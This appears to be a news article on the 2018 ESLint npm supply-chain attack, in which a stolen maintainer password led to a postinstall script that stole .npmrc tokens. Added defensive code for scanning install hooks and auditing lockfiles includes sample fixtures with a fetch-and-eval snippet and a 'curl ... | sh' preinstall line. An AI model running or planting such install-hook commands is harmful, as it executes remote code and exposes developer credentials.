Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm

The npm registry maintainers invalidated developer login tokens last week after attackers compromised two legitimate packages associated with the ESLint library and rigged them with malicious code.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry,” the ESLint team said in an incident report.

The rogue versions included a malicious postinstall script that downloaded and executed rogue code from pastebin.com designed to steal users’ .npmrc files. These are local configuration files that typically contain access tokens for publishing packages to the npm registry.
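A scanner for the install-hook pattern described above, added here as an example and not code from the ESLint project or npm. It reads parsed package.json manifests, looks at each lifecycle hook (preinstall, install, postinstall, prepare) and at any local script the hook runs, and flags remote URLs, network calls, dynamic evaluation of downloaded text and references to .npmrc. The manifests, file contents, URL and IP address below are constructed samples, not the real 2018 payload; the indicator list is a heuristic you would tune for your own tree.

```javascript
// Added example, not code from the ESLint project or npm: scan parsed package.json
// manifests for lifecycle hooks that fetch and run remote code, the shape of the
// malicious eslint-scope 3.7.2 postinstall. All manifests and file contents below
// are constructed samples; the URL and IP address are placeholders.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators that an install hook reaches the network, evaluates
// downloaded text, or touches npm credentials.
const SUSPICIOUS = [
  { id: "remote-url", re: /https?:\/\/[^\s"']+/i },
  { id: "network-call", re: /\b(curl|wget)\b|\bhttps?\.(get|request)\s*\(/i },
  { id: "dynamic-eval", re: /\beval\s*\(|new\s+Function\s*\(/i },
  { id: "npmrc-access", re: /\.npmrc\b/ },
];

function indicators(text) {
  return SUSPICIOUS.filter(({ re }) => re.test(text)).map(({ id }) => id);
}

// manifests: [{ name, version, scripts, files }] where `files` maps a path inside
// the package to its contents. In real use you would read each
// node_modules/<name>/package.json and the files its hooks reference from disk.
function findSuspiciousInstallScripts(manifests) {
  const findings = [];
  for (const pkg of manifests) {
    const scripts = pkg.scripts || {};
    const files = pkg.files || {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd !== "string") continue;
      // Check the command line itself ...
      const hits = new Set(indicators(cmd));
      // ... and any local script it runs: a hook such as "node ./lib/build.js"
      // looks innocuous on its own while the fetch lives in the file it executes.
      for (const m of cmd.matchAll(/\bnode\s+(\S+\.js)\b/g)) {
        const body = files[m[1].replace(/^\.\//, "")];
        if (body) for (const id of indicators(body)) hits.add(id);
      }
      if (hits.size > 0) {
        findings.push({
          package: `${pkg.name}@${pkg.version}`,
          hook,
          command: cmd,
          indicators: [...hits].sort(),
        });
      }
    }
  }
  return findings;
}

// Constructed sample manifests: one benign, one with the fetch hidden in a file,
// one with the fetch inline in the hook command.
const SAMPLE_MANIFESTS = [
  {
    name: "harmless-lib",
    version: "1.0.0",
    scripts: { test: "mocha", postinstall: "node ./scripts/postinstall.js" },
    files: { "scripts/postinstall.js": "console.log('thanks for installing harmless-lib');" },
  },
  {
    name: "evil-scope",
    version: "3.7.2",
    scripts: { postinstall: "node ./lib/build.js" },
    files: {
      "lib/build.js": [
        "const https = require('https');",
        "https.get('https://pastebin.com/raw/EXAMPLE', (r) => {",
        "  let s = ''; r.on('data', (d) => { s += d; }); r.on('end', () => eval(s));",
        "});",
      ].join("\n"),
    },
  },
  {
    name: "inline-fetch",
    version: "0.1.0",
    scripts: { preinstall: "curl -s http://203.0.113.10/x.sh | sh" },
  },
];

console.log(JSON.stringify(findSuspiciousInstallScripts(SAMPLE_MANIFESTS), null, 2));
```

Run it over the manifests you read from node_modules after an install. To keep hooks from running at all, npm's `ignore-scripts` setting (`npm config set ignore-scripts true`, or `npm ci --ignore-scripts`) disables lifecycle scripts, at the cost of breaking the minority of packages that legitimately need them.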

In other words, this was a fully fledged software supply-chain attack whose goal was to harvest publishing credentials from other developers and, potentially, poison their packages in turn to extend the compromise further.

ESLint is a popular open-source JavaScript utility for linting, a static code analysis process used to identify programming bugs, stylistic errors and potentially problematic code constructs. The utility is hosted by the JS Foundation, uses the Node.js runtime environment and is installed via npm.

According to the ESLint incident report, the attackers found a maintainer’s npm email and password in a third-party breach, which indicates poor password hygiene.

Reusing passwords across multiple services is a dangerous practice and a common cause for account hijackings. Attackers automatically test leaked credentials against multiple websites using so-called credential stuffing techniques.


Unfortunately, despite the widespread availability of easy-to-use password management tools, credential reuse continues to remain a common practice among users, including developers. A recent incident where malicious code was published on the Gentoo Linux repository on GitHub was also the result of an administrator having his or her password compromised in a third-party breach.

In the case of ESLint, the attackers used the compromised npm account to publish a new version (5.0.2) of the eslint-config-eslint package containing the malicious postinstall script. They then unpublished eslint-config-eslint 5.0.2 and published eslint-scope 3.7.2 containing the same script.

Fortunately, the malicious code was spotted by an ESLint user within 40 minutes and the project’s maintainers were alerted. The eslint-scope 3.7.2 package was taken down one and a half hours later and a clean eslint-scope version (3.7.3) was published in its place so that caches would be updated.

The npm team also decided to invalidate all login tokens created before 2018-07-12 12:30 UTC in order to mitigate any effect the attack might have had on other developers. This action caused some load issues on npmjs.com that were quickly resolved.

“Your npm login token does not give an attacker your npm password,” the npm registry maintainers said. “You can revoke all existing tokens by visiting https://www.npmjs.com/settings/~/tokens” (log-in required).

Following the incident the ESLint team published the following recommendations for all developers who publish on npm:

  • Package maintainers and users should avoid reusing the same password across multiple different sites. A password manager like 1Password or LastPass can help with this.
  • Package maintainers should enable npm two-factor authentication. npm has a guide here. If you use Lerna, you can follow this issue.
  • Package maintainers should audit and limit the number of people who have access to publish on npm.
  • Package maintainers should be careful with using any services that auto-merge dependency upgrades.
  • Application developers should use a lock file (package-lock.json or yarn.lock) to prevent the auto-install of new packages.
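The lock-file recommendation above, as an added example that is not ESLint's or npm's code: a check a CI job can run to confirm that package-lock.json pins every declared dependency, carries an integrity hash and resolves to the registry you expect, plus a small caret-range helper that shows why a range such as ^3.7.1 on its own would have admitted a freshly published 3.7.2 while the lockfile keeps `npm ci` on 3.7.1. The manifest, lockfile and hash values are constructed; the helper handles only exact versions and caret ranges and does not implement the rest of semver.

```javascript
// Added example, not ESLint's or npm's code: audit package-lock.json against
// package.json. The manifest and lockfile below are constructed samples in the
// lockfileVersion 1 layout (current in 2018); integrity values are placeholders.
const ALLOWED_REGISTRY = "https://registry.npmjs.org/";

// Minimal semver handling: exact versions and caret ranges ("^3.7.1") only.
// Pre-release tags and other range operators are out of scope here.
function parseVer(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  if (!m) throw new Error(`unsupported version: ${v}`);
  return m.slice(1).map(Number);
}

function rangeAdmits(range, version) {
  const v = parseVer(version);
  if (!range.startsWith("^")) return range === version;
  const base = parseVer(range.slice(1));
  if (v[0] !== base[0]) return false;                  // caret keeps the major
  if (base[0] === 0 && base[1] === 0) {                // ^0.0.z is exact
    return v[1] === 0 && v[2] === base[2];
  }
  if (base[0] === 0) {                                 // ^0.y.z keeps the minor
    return v[1] === base[1] && v[2] >= base[2];
  }
  if (v[1] > base[1]) return true;
  return v[1] === base[1] && v[2] >= base[2];
}

// Top-level entries of a v1 lockfile ("dependencies" tree) or a v2/v3 lockfile
// ("packages" map keyed by node_modules path), as { name: { version, resolved, integrity } }.
function lockedEntries(lock) {
  const out = {};
  if (lock.packages) {
    for (const [key, entry] of Object.entries(lock.packages)) {
      const m = /^node_modules\/((?:@[^/]+\/)?[^/]+)$/.exec(key);
      if (m) out[m[1]] = entry;
    }
  } else {
    for (const [name, entry] of Object.entries(lock.dependencies || {})) out[name] = entry;
  }
  return out;
}

// One finding per problem: a dependency with no lock entry, a locked version the
// declared range no longer admits, a missing SRI hash, or a tarball from elsewhere.
function auditLock(manifest, lock) {
  const declared = { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
  const locked = lockedEntries(lock);
  const findings = [];
  for (const [name, range] of Object.entries(declared)) {
    const entry = locked[name];
    if (!entry) { findings.push({ name, problem: "not-in-lockfile" }); continue; }
    if (!rangeAdmits(range, entry.version)) findings.push({ name, problem: "lock-outside-range" });
    if (!entry.integrity || !/^sha(256|384|512)-/.test(entry.integrity)) {
      findings.push({ name, problem: "missing-integrity" });
    }
    if (!entry.resolved || !entry.resolved.startsWith(ALLOWED_REGISTRY)) {
      findings.push({ name, problem: "unexpected-registry" });
    }
  }
  return findings;
}

// Constructed sample: eslint-scope is pinned at the clean 3.7.1, left-pad points
// at an internal mirror, and mocha was declared but never locked.
const SAMPLE_MANIFEST = {
  name: "sample-app",
  dependencies: { "eslint-scope": "^3.7.1", "left-pad": "^1.3.0" },
  devDependencies: { mocha: "^5.2.0" },
};

const SAMPLE_LOCK = {
  lockfileVersion: 1,
  dependencies: {
    "eslint-scope": {
      version: "3.7.1",
      resolved: "https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.1.tgz",
      integrity: "sha512-PLACEHOLDER",
    },
    "left-pad": {
      version: "1.3.0",
      resolved: "http://mirror.example.internal/left-pad/-/left-pad-1.3.0.tgz",
      integrity: "sha512-PLACEHOLDER",
    },
  },
};

console.log("^3.7.1 admits 3.7.2:", rangeAdmits("^3.7.1", "3.7.2"));
console.log(JSON.stringify(auditLock(SAMPLE_MANIFEST, SAMPLE_LOCK), null, 2));
```

The range check is the point of the recommendation: ^3.7.1 admits 3.7.2, so a tree with no lockfile would have resolved straight to the malicious release, whereas `npm ci` installs exactly the versions and hashes the lockfile records and refuses to run when package.json and the lockfile disagree. A real job would read both files from disk, run `auditLock` and fail the build on any finding.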

For more detailed information on password management and online account security, you can read our own TNS guide.

Feature image via Pixabay.

Source: InApps.net
